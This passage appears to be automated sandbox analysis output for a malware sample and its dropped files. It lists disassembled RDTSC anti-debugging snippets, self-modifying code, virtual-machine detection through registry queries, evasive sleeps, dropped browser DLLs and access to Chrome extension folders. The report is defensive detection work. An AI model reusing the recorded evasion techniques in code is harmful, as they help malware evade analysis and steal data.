Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A096E second address: 52A0A1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b pushad 0x0000000c push ebx 0x0000000d pushfd 0x0000000e jmp 00007FEE84E88FD6h 0x00000013 and cx, E038h 0x00000018 jmp 00007FEE84E88FCBh 0x0000001d popfd 0x0000001e pop esi 0x0000001f call 00007FEE84E88FD9h 0x00000024 mov cx, 5557h 0x00000028 pop esi 0x00000029 popad 0x0000002a mov esi, dword ptr [ebp+08h] 0x0000002d jmp 00007FEE84E88FD3h 0x00000032 sub ebx, ebx 0x00000034 pushad 0x00000035 movsx ebx, ax 0x00000038 mov bh, cl 0x0000003a popad 0x0000003b test esi, esi 0x0000003d jmp 00007FEE84E88FD9h 0x00000042 je 00007FEEF6AFE957h 0x00000048 jmp 00007FEE84E88FCEh 0x0000004d cmp dword ptr [esi+08h], DDEEDDEEh 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0A1E second address: 52A0A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0A22 second address: 52A0A28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0A28 second address: 52A0A75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, C391h 0x00000007 pushfd 0x00000008 jmp 00007FEE851EFD8Eh 0x0000000d or cx, 30E8h 0x00000012 jmp 00007FEE851EFD8Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ecx, esi 0x0000001d jmp 00007FEE851EFD96h 0x00000022 je 00007FEEF6E656BFh 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b mov ebx, eax 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0A75 second address: 52A0AA3 instructions: 0x00000000 rdtsc 0x00000002 mov bx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov esi, 0CD183DBh 0x0000000c popad 0x0000000d test byte ptr [76FA6968h], 00000002h 0x00000014 jmp 00007FEE84E88FCEh 0x00000019 jne 00007FEEF6AFE8E5h 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0AA3 second address: 52A0AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0AA7 second address: 52A0AC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0AC4 second address: 52A0B84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d mov bx, si 0x00000010 call 00007FEE851EFD98h 0x00000015 mov bx, si 0x00000018 pop esi 0x00000019 popad 0x0000001a push edx 0x0000001b jmp 00007FEE851EFD8Ah 0x00000020 mov dword ptr [esp], ebx 0x00000023 jmp 00007FEE851EFD90h 0x00000028 xchg eax, ebx 0x00000029 pushad 0x0000002a mov di, cx 0x0000002d jmp 00007FEE851EFD8Ah 0x00000032 popad 0x00000033 push eax 0x00000034 jmp 00007FEE851EFD8Bh 0x00000039 xchg eax, ebx 0x0000003a pushad 0x0000003b mov cx, 8B3Bh 0x0000003f pushfd 0x00000040 jmp 00007FEE851EFD90h 0x00000045 jmp 00007FEE851EFD95h 0x0000004a popfd 0x0000004b popad 0x0000004c push dword ptr [ebp+14h] 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007FEE851EFD98h 0x00000058 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0B84 second address: 52A0B88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0B88 second address: 52A0B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0B8E second address: 52A0B9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEE84E88FCDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0B9F second address: 52A0BA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0BC6 second address: 52A0BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0BCA second address: 52A0BD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0BD0 second address: 52A0C38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 pushfd 0x00000007 jmp 00007FEE84E88FCDh 0x0000000c add ecx, 38721216h 0x00000012 jmp 00007FEE84E88FD1h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pop esi 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FEE84E88FCCh 0x00000023 sub ecx, 7B380638h 0x00000029 jmp 00007FEE84E88FCBh 0x0000002e popfd 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FEE84E88FD6h 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0C38 second address: 52A0C3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0C3C second address: 52A0C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d mov cx, di 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FECC2 second address: 8FECCC instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEE851EFD86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FECCC second address: 8FECD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FEE84E88FC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FF08C second address: 8FF092 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C0044 second address: 52C004A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C004A second address: 52C0083 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FEE851EFD8Ah 0x0000000b adc ax, 2048h 0x00000010 jmp 00007FEE851EFD8Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FEE851EFD90h 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C0083 second address: 52C0089 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0D3D second address: 52B0D43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0D43 second address: 52B0D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0D47 second address: 52B0D4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0D4B second address: 52B0D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a jmp 00007FEE84E88FCBh 0x0000000f popad 0x00000010 mov dword ptr [esp], ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0D6A second address: 52B0D85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0D85 second address: 52B0D8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52B0D8B second address: 52B0DB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FEE851EFD95h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5320F79 second address: 5320FBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007FEE84E88FD6h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FEE84E88FD7h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5320FBC second address: 5320FC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5320FC2 second address: 5320FC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 53203F9 second address: 53203FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 53203FF second address: 5320410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEE84E88FCDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5320410 second address: 5320438 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FEE851EFD8Dh 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5320271 second address: 5320282 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, ah 0x00000005 push ebx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5320282 second address: 5320286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5320286 second address: 532028C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 532028C second address: 53202A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEE851EFD8Ah 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], ebp 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 mov ax, 92F9h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 53202A8 second address: 53202CD instructions: 0x00000000 rdtsc 0x00000002 mov al, 65h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ecx, ebx 0x00000008 popad 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FEE84E88FD8h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C037E second address: 52C0397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FEE851EFD93h 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 532069C second address: 53206EB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FEE84E88FCBh 0x0000000c jmp 00007FEE84E88FD3h 0x00000011 popfd 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 jmp 00007FEE84E88FD6h 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FEE84E88FCEh 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 53206EB second address: 5320717 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 pushfd 0x00000007 jmp 00007FEE851EFD8Ah 0x0000000c sbb ax, 50E8h 0x00000011 jmp 00007FEE851EFD8Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5320717 second address: 532071B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 532071B second address: 532071F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Special instruction interceptor: First address: 73EBB1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Special instruction interceptor: First address: 8F3280 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Special instruction interceptor: First address: 906AC6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Special instruction interceptor: First address: 97E462 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 50EBB1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 6C3280 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 6D6AC6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 74E462 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Code function: 6_2_05320823 rdtsc 6_2_05320823
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Window / User API: threadDelayed 1359 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 2147 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 3333 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Window / User API: threadDelayed 779 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe API coverage: 0.8 %
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe API coverage: 0.0 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe TID: 4128 Thread sleep count: 1359 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2072 Thread sleep count: 32 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2072 Thread sleep time: -64032s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 5792 Thread sleep count: 33 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 5792 Thread sleep time: -66033s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3292 Thread sleep count: 314 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3292 Thread sleep time: -9420000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2292 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3292 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe TID: 5616 Thread sleep count: 779 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe TID: 5616 Thread sleep count: 40 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C32C930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6C32C930
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, a3b2c9311b.exe, 0000000E.00000002.2767076722.000000000029C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
